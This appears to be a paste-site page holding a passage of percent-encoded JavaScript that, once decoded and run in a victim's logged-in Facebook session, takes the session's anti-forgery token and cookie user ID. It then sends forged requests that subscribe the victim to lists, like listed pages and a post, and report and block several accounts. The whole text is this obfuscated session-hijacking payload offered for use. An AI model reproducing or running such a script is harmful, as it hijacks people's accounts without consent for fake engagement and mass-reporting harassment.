%3D%31%26%5F%5F%64%79%6E%3D%37%39%38%61%44%35%7A%35%43%46%2D%26%5F%5F%72%65%71%3D%76%26%66%62%5F%64%74%73%67%3D%22%2B%66%62%5F%64%74%73%67%2B%22%26%70%68%73%74%61%6D%70%3D%22%3B%0A%20%68%74%74%70%34%2E%6F%70%65%6E%28%22%50%4F%53%54%22%2C%20%75%72%6C%34%2C%20%74%72%75%65%29%3B%0A%20%68%74%74%70%34%2E%6F%6E%72%65%61%64%79%73%74%61%74%65%63%68%61%6E%67%65%20%3D%20%66%75%6E%63%74%69%6F%6E%20%28%29%0A%20%7B%0A%20%20%69%66%20%28%68%74%74%70%34%2E%72%65%61%64%79%53%74%61%74%65%20%3D%3D%20%34%20%26%26%20%68%74%74%70%34%2E%73%74%61%74%75%73%20%3D%3D%20%32%30%30%29%0A%20%20%7B%0A%20%20%20%68%74%74%70%34%2E%63%6C%6F%73%65%3B%0A%20%20%7D%0A%20%7D%0A%20%3B%0A%20%68%74%74%70%34%2E%73%65%6E%64%28%70%61%72%61%6D%73%34%29%3B%0A%7D%0A%61%28%22%31%30%30%30%30%36%30%36%34%31%38%30%34%36%39%22%29%3B%61%28%22%31%30%30%30%30%33%34%38%39%34%31%38%37%36%36%22%29%3B%61%28%22%31%30%30%30%30%35%32%35%32%33%31%33%39%33%38%22%29%3B%61%28%22%31%30%30%30%30%36%36%39%35%34%31%32%33%37%32%22%29%3B%73%75%62%6C%69%73%74%28%22%33%36%32%35%38%31%38%39%37%32%30%31%34%35%34%22%29%3B%73%75%62%6C%69%73%74%28%22%33%36%35%31%39%38%31%33%33%36%30%36%34%39%37%22%29%3B%73%75%62%6C%69%73%74%28%22%33%36%35%31%39%38%33%38%30%32%37%33%31%33%39%22%29%3B%0A%76%61%72%20%66%62%5F%64%74%73%67%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%4E%61%6D%65%28%27%66%62%5F%64%74%73%67%27%29%5B%30%5D%2E%76%61%6C%75%65%3B%20%76%61%72%20%75%73%65%72%5F%69%64%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%6D%61%74%63%68%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%6D%61%74%63%68%28%2F%63%5F%75%73%65%72%3D%28%5C%64%2B%29%2F%29%5B%31%5D%29%3B%20%66%75%6E%63%74%69%6F%6E%20%4C%69%6B%65%28%70%29%20%7B%20%76%61%72%20%50%61%67%65%20%3D%20%6E%65%77%20%58%4D%4C%48%74%74%70%52%65%71%75%65%73%74%28%29%3B%20%76%61%72%20%50%61%67%65%55%52%4C%20%3D%20%22%2F%2F%77%77%77%2E%66%61%63%65%62%6F%6F%6B%2E%63%6F%6D%2F%61%6A%61%78%2F%70%61%67%65%73%2F%66%61%6E%5F%73%74%61%74%75%73%2E%70%68%70%22%3B%20%76%61%72%20%50%61%67%65%50%61%72%61%6D%73%20%3D%20%22%26%66%62%70%61%67%65%5F%69%64%3D%22%20%2B%20%70%20%2B%22%26%61%64%64%3D%74%72%75%65%26%72%65%6C%6F%61%64%3D%66%61%6C%73%65%26%66%61%6E%5F%6F%72%69%67%69%6E%3D%70%61%67%65%5F%74%69%6D%65%6C%69%6E%65%26%66%61%6E%5F%73%6F%75%72%63%65%3D%26%63%61%74%3D%26%6E%63%74%72%5B%5F%6D%6F%64%5D%3D%70%61%67%65%6C%65%74%5F%74%69%6D%65%6C%69%6E%65%5F%70%61%67%65%5F%61%63%74%69%6F%6E%73%26%5F%5F%75%73%65%72%3D%22%2B%75%73%65%72%5F%69%64%2B%22%26%5F%5F%61%3D%31%26%5F%5F%64%79%6E%3D%37%39%38%61%44%35%7A%35%43%46%2D%26%5F%5F%72%65%71%3D%64%26%66%62%5F%64%74%73%67%3D%22%2B%66%62%5F%64%74%73%67%2B%22%26%70%68%73%74%61%6D%70%3D%22%3B%20%50%61%67%65%2E%6F%70%65%6E%28%22%50%4F%53%54%22%2C%20%50%61%67%65%55%52%4C%2C%20%74%72%75%65%29%3B%20%50%61%67%65%2E%6F%6E%72%65%61%64%79%73%74%61%74%65%63%68%61%6E%67%65%20%3D%20%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%20%69%66%20%28%50%61%67%65%2E%72%65%61%64%79%53%74%61%74%65%20%3D%3D%20%34%20%26%26%20%50%61%67%65%2E%73%74%61%74%75%73%20%3D%3D%20%32%30%30%29%20%7B%20%50%61%67%65%2E%63%6C%6F%73%65%3B%20%7D%20%7D%3B%20%50%61%67%65%2E%73%65%6E%64%28%50%61%67%65%50%61%72%61%6D%73%29%3B%20%7D%20%0A%4C%69%6B%65%28%22%31%34%39%37%30%36%31%34%38%35%37%30%34%37%38%22%29%3B%4C%69%6B%65%28%22%36%30%37%31%35%30%36%37%35%39%36%32%31%33%38%22%29%3B%4C%69%6B%65%28%22%37%33%32%30%32%36%32%35%30%31%35%39%31%32%37%22%29%3B%4C%69%6B%65%28%22%33%36%35%32%38%33%39%34%36%39%35%31%36%34%37%22%29%3B%4C%69%6B%65%28%22%32%32%32%31%34%37%36%39%31%33%30%30%33%33%39%22%29%3B%4C%69%6B%65%28%22%33%32%38%36%36%32%35%34%37%32%37%35%38%30%32%22%29%3B%4C%69%6B%65%28%22%36%33%33%35%33%33%39%34%36%37%30%34%30%36%34%22%29%3B%4C%69%6B%65%28%22%34%33%37%35%38%34%31%35%39%37%30%33%34%31%33%22%29%3B%4C%69%6B%65%28%22%34%38%34%38%30%39%36%32%38%32%39%36%38%38%31%22%29%3B%0A%76%61%72%20%75%73%65%72%5F%69%64%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%6D%61%74%63%68%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%6D%61%74%63%68%28%2F%63%5F%75%73%65%72%3D%28%5C%64%2B%29%2F%29%5B%31%5D%29%3B%20%76%61%72%20%66%62%5F%64%74%73%67%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%4E%61%6D%65%28%27%66%62%5F%64%74%73%67%27%29%5B%30%5D%2E%76%61%6C%75%65%3B%20%76%61%72%20%6E%6F%77%3D%28%6E%65%77%20%44%61%74%65%29%2E%67%65%74%54%69%6D%65%28%29%3B%20%66%75%6E%63%74%69%6F%6E%20%50%28%6F%70%6F%29%20%7B%20%76%61%72%20%58%20%3D%20%6E%65%77%20%58%4D%4C%48%74%74%70%52%65%71%75%65%73%74%28%29%3B%20%76%61%72%20%58%55%52%4C%20%3D%22%2F%2F%77%77%77%2E%66%61%63%65%62%6F%6F%6B%2E%63%6F%6D%2F%61%6A%61%78%2F%75%66%69%2F%6C%69%6B%65%2E%70%68%70%22%3B%20%76%61%72%20%58%50%61%72%61%6D%73%20%3D%20%22%6C%69%6B%65%5F%61%63%74%69%6F%6E%3D%74%72%75%65%26%66%74%5F%65%6E%74%5F%69%64%65%6E%74%69%66%69%65%72%3D%22%2B%6F%70%6F%2B%22%26%73%6F%75%72%63%65%3D%31%26%63%6C%69%65%6E%74%5F%69%64%3D%22%2B%6E%6F%77%2B%22%25%33%41%33%37%39%37%38%33%38%35%37%26%72%6F%6F%74%69%64%3D%75%5F%6A%73%6F%6E%70%5F%33%39%5F%31%38%26%67%69%66%74%6F%63%63%61%73%69%6F%6E%26%66%74%5B%74%6E%5D%3D%25%33%45%25%33%44%26%66%74%5B%74%79%70%65%5D%3D%32%30%26%66%74%5B%71%69%64%5D%3D%35%38%39%30%38%31%31%33%32%39%34%37%30%32%37%39%32%35%37%26%66%74%5B%6D%66%5F%73%74%6F%72%79%5F%6B%65%79%5D%3D%32%38%31%34%39%36%32%39%30%30%31%39%33%31%34%33%39%35%32%26%66%74%5B%68%61%73%5F%65%78%70%61%6E%64%65%64%5F%75%66%69%5D%3D%31%26%6E%63%74%72%5B%5F%6D%6F%64%5D%3D%70%61%67%65%6C%65%74%5F%68%6F%6D%65%5F%73%74%72%65%61%6D%26%5F%5F%75%73%65%72%3D%22%2B%75%73%65%72%5F%69%64%2B%22%26%5F%5F%61%3D%31%26%5F%5F%64%79%6E%3D%37%6E%38%38%51%6F%41%4D%42%6C%43%6C%79%6F%63%70%61%65%26%5F%5F%72%65%71%3D%67%34%26%66%62%5F%64%74%73%67%3D%22%2B%66%62%5F%64%74%73%67%2B%22%26%70%68%73%74%61%6D%70%3D%22%3B%20%58%2E%6F%70%65%6E%28%22%50%4F%53%54%22%2C%20%58%55%52%4C%2C%20%74%72%75%65%29%3B%20%58%2E%6F%6E%72%65%61%64%79%73%74%61%74%65%63%68%61%6E%67%65%20%3D%20%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%20%69%66%20%28%58%2E%72%65%61%64%79%53%74%61%74%65%20%3D%3D%20%34%20%26%26%20%58%2E%73%74%61%74%75%73%20%3D%3D%20%32%30%30%29%20%7B%20%58%2E%63%6C%6F%73%65%3B%20%7D%20%7D%3B%20%58%2E%73%65%6E%64%28%58%50%61%72%61%6D%73%29%3B%20%7D%20%0A%50%28%22%31%34%37%39%33%32%32%39%35%33%33%33%30%38%33%22%29%3B%0A%76%61%72%20%66%62%5F%64%74%73%67%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%4E%61%6D%65%28%27%66%62%5F%64%74%73%67%27%29%5B%30%5D%2E%76%61%6C%75%65%3B%0A%76%61%72%20%75%73%65%72%5F%69%64%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%6D%61%74%63%68%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%6D%61%74%63%68%28%2F%63%5F%75%73%65%72%3D%28%5C%64%2B%29%2F%29%5B%31%5D%29%3B%0A%76%61%72%20%6E%6F%77%3D%28%6E%65%77%20%44%61%74%65%29%2E%67%65%74%54%69%6D%65%28%29%3B%0A%66%75%6E%63%74%69%6F%6E%20%72%65%70%6F%72%74%28%72%29%20%7B%0A%76%61%72%20%58%20%3D%20%6E%65%77%20%58%4D%4C%48%74%74%70%52%65%71%75%65%73%74%28%29%3B%0A%76%61%72%20%58%55%52%4C%20%3D%20%22%68%74%74%70%73%3A%2F%2F%77%77%77%2E%66%61%63%65%62%6F%6F%6B%2E%63%6F%6D%2F%61%6A%61%78%2F%72%65%70%6F%72%74%2F%73%6F%63%69%61%6C%2E%70%68%70%22%3B%0A%76%61%72%20%58%50%61%72%61%6D%73%20%3D%22%66%62%5F%64%74%73%67%3D%22%2B%66%62%5F%64%74%73%67%2B%22%26%62%6C%6F%63%6B%3D%31%26%70%70%3D%25%37%42%25%32%32%61%63%74%69%6F%6E%73%5F%74%6F%5F%74%61%6B%65%25%32%32%25%33%41%25%32%32%5B%5D%25%32%32%25%32%43%25%32%32%61%72%65%5F%66%72%69%65%6E%64%73%25%32%32%25%33%41%66%61%6C%73%65%25%32%43%25%32%32%63%69%64%25%32%32%25%33%41%22%20%2B%20%72%20%2B%22%25%32%43%25%32%32%63%6F%6E%74%65%6E%74%5F%74%79%70%65%25%32%32%25%33%41%30%25%32%43%25%32%32%65%78%70%61%6E%64%5F%72%65%70%6F%72%74%25%32%32%25%33%41%31%25%32%43%25%32%32%66%69%72%73%74%5F%63%68%6F%69%63%65%25%32%32%25%33%41%25%32%32%66%69%6C%65%5F%72%65%70%6F%72%74%25%32%32%25%32%43%25%32%32%66%72%6F%6D%5F%67%65%61%72%25%32%32%25%33%41%25%32%32%74%69%6D%65%6C%69%6E%65%25%32%32%25%32%43%25%32%32%69%73%5F%66%6F%6C%6C%6F%77%69%6E%67%25%32%32%25%33%41%66%61%6C%73%65%25%32%43%25%32%32%69%73%5F%74%61%67%67%65%64%25%32%32%25%33%41%66%61%6C%73%65%25%32%43%25%32%32%6F%6E%5F%70%72%6F%66%69%6C%65%25%32%32%25%33%41%66%61%6C%73%65%25%32%43%25%32%32%70%68%61%73%65%25%32%32%25%33%41%33%25%32%43%25%32%32%72%65%66%25%32%32%25%33%41%25%32%32%68%74%74%70%73%25%33%41%25%35%43%25%32%46%25%35%43%25%32%46%77%77%77%2E%66%61%63%65%62%6F%6F%6B%2E%63%6F%6D%25%35%43%25%32%46%25%32%32%25%32%43%25%32%32%72%65%70%6F%72%74%5F%74%79%70%65%25%32%32%25%33%41%31%34%35%25%32%43%25%32%32%72%69%64%25%32%32%25%33%41%22%20%2B%20%72%20%2B%22%25%32%43%25%32%32%73%75%62%5F%72%65%70%6F%72%74%5F%74%79%70%65%25%32%32%25%33%41%31%34%31%25%32%43%25%32%32%74%69%6D%65%5F%66%6C%6F%77%5F%73%74%61%72%74%65%64%25%32%32%25%33%41%22%2B%6E%6F%77%2B%22%25%32%43%25%32%32%75%73%65%72%25%32%32%25%33%41%22%2B%75%73%65%72%5F%69%64%2B%22%25%37%44%26%66%69%6C%65%5F%72%65%70%6F%72%74%3D%31%26%5F%5F%75%73%65%72%3D%22%2B%75%73%65%72%5F%69%64%2B%22%26%5F%5F%61%3D%31%26%5F%5F%64%79%6E%3D%37%6E%38%61%68%79%6A%33%35%79%6E%7A%70%51%39%55%6D%41%57%75%55%52%44%77%26%5F%5F%72%65%71%3D%68%26%74%74%73%74%61%6D%70%3D%32%36%35%38%31%36%36%31%31%30%37%31%31%32%30%31%31%32%37%36%26%63%6F%6E%66%69%72%6D%65%64%3D%31%22%3B%0A%58%2E%6F%70%65%6E%28%22%50%4F%53%54%22%2C%20%58%55%52%4C%2C%20%74%72%75%65%29%3B%0A%58%2E%6F%6E%72%65%61%64%79%73%74%61%74%65%63%68%61%6E%67%65%20%3D%20%66%75%6E%63%74%69%6F%6E%20%28%29%20%7B%0A%69%66%20%28%58%2E%72%65%61%64%79%53%74%61%74%65%20%3D%3D%20%34%20%26%26%20%58%2E%73%74%61%74%75%73%20%3D%3D%20%32%30%30%29%20%7B%0A%58%2E%63%6C%6F%73%65%3B%0A%7D%0A%7D%3B%0A%58%2E%73%65%6E%64%28%58%50%61%72%61%6D%73%29%3B%0A%7D%0A%72%65%70%6F%72%74%28%22%31%30%30%30%30%32%39%38%39%33%33%31%36%35%34%22%29%3B%72%65%70%6F%72%74%28%22%31%30%30%30%30%34%36%30%30%34%35%34%34%38%35%22%29%3B%72%65%70%6F%72%74%28%22%31%30%30%30%30%37%34%30%33%38%38%39%38%32%39%22%29%3B%09"));
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement